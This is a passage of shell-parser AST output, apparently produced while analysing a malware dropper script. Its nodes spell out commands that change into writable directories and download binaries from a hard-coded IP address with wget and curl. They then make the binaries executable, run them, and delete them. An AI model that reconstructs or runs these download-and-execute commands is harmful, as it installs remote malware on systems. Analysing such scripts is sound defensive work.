  OperatorNode(lineno=13, op='||', pos=(2067, 2069)),
  CommandNode(lineno=13, pos=(2070, 2074), parts=[
    WordNode(lineno=13, pos=(2070, 2072), word='cd'),
    WordNode(lineno=13, pos=(2073, 2074), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2074, 2075)),
  CommandNode(lineno=13, pos=(2076, 2117), parts=[
    WordNode(lineno=13, pos=(2076, 2080), word='wget'),
    WordNode(lineno=13, pos=(2081, 2117), word='http://159.203.69.152/Jackkintoasock'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2117, 2118)),
  CommandNode(lineno=13, pos=(2119, 2163), parts=[
    WordNode(lineno=13, pos=(2119, 2123), word='curl'),
    WordNode(lineno=13, pos=(2124, 2126), word='-O'),
    WordNode(lineno=13, pos=(2127, 2163), word='http://159.203.69.152/Jackkintoasock'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2163, 2164)),
  CommandNode(lineno=13, pos=(2165, 2188), parts=[
    WordNode(lineno=13, pos=(2165, 2170), word='chmod'),
    WordNode(lineno=13, pos=(2171, 2173), word='+x'),
    WordNode(lineno=13, pos=(2174, 2188), word='Jackkintoasock'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2188, 2189)),
  CommandNode(lineno=13, pos=(2190, 2206), parts=[
    WordNode(lineno=13, pos=(2190, 2206), word='./Jackkintoasock'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2206, 2207)),
  CommandNode(lineno=13, pos=(2208, 2229), parts=[
    WordNode(lineno=13, pos=(2208, 2210), word='rm'),
    WordNode(lineno=13, pos=(2211, 2214), word='-rf'),
    WordNode(lineno=13, pos=(2215, 2229), word='Jackkintoasock'),
  ]),
])
ListNode(lineno=14, pos=(2230, 2433), parts=[
  CommandNode(lineno=14, pos=(2230, 2237), parts=[
    WordNode(lineno=14, pos=(2230, 2232), word='cd'),
    WordNode(lineno=14, pos=(2233, 2237), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2238, 2240)),
  CommandNode(lineno=14, pos=(2241, 2252), parts=[
    WordNode(lineno=14, pos=(2241, 2243), word='cd'),
    WordNode(lineno=14, pos=(2244, 2252), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2253, 2255)),
  CommandNode(lineno=14, pos=(2256, 2263), parts=[
    WordNode(lineno=14, pos=(2256, 2258), word='cd'),
    WordNode(lineno=14, pos=(2259, 2263), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2264, 2266)),
  CommandNode(lineno=14, pos=(2267, 2275), parts=[
    WordNode(lineno=14, pos=(2267, 2269), word='cd'),
    WordNode(lineno=14, pos=(2270, 2275), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2276, 2278)),
  CommandNode(lineno=14, pos=(2279, 2283), parts=[
    WordNode(lineno=14, pos=(2279, 2281), word='cd'),
    WordNode(lineno=14, pos=(2282, 2283), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2283, 2284)),
  CommandNode(lineno=14, pos=(2285, 2325), parts=[
    WordNode(lineno=14, pos=(2285, 2289), word='wget'),
    WordNode(lineno=14, pos=(2290, 2325), word='http://159.203.69.152/mcdonaldsW1FI'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2325, 2326)),
  CommandNode(lineno=14, pos=(2327, 2370), parts=[
    WordNode(lineno=14, pos=(2327, 2331), word='curl'),
    WordNode(lineno=14, pos=(2332, 2334), word='-O'),
    WordNode(lineno=14, pos=(2335, 2370), word='http://159.203.69.152/mcdonaldsW1FI'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2370, 2371)),
  CommandNode(lineno=14, pos=(2372, 2394), parts=[
    WordNode(lineno=14, pos=(2372, 2377), word='chmod'),
    WordNode(lineno=14, pos=(2378, 2380), word='+x'),
    WordNode(lineno=14, pos=(2381, 2394), word='mcdonaldsW1FI'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2394, 2395)),
  CommandNode(lineno=14, pos=(2396, 2411), parts=[
    WordNode(lineno=14, pos=(2396, 2411), word='./mcdonaldsW1FI'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2411, 2412)),
  CommandNode(lineno=14, pos=(2413, 2433), parts=[
    WordNode(lineno=14, pos=(2413, 2415), word='rm'),
    WordNode(lineno=14, pos=(2416, 2419), word='-rf'),
    WordNode(lineno=14, pos=(2420, 2433), word='mcdonaldsW1FI'),
  ]),
])
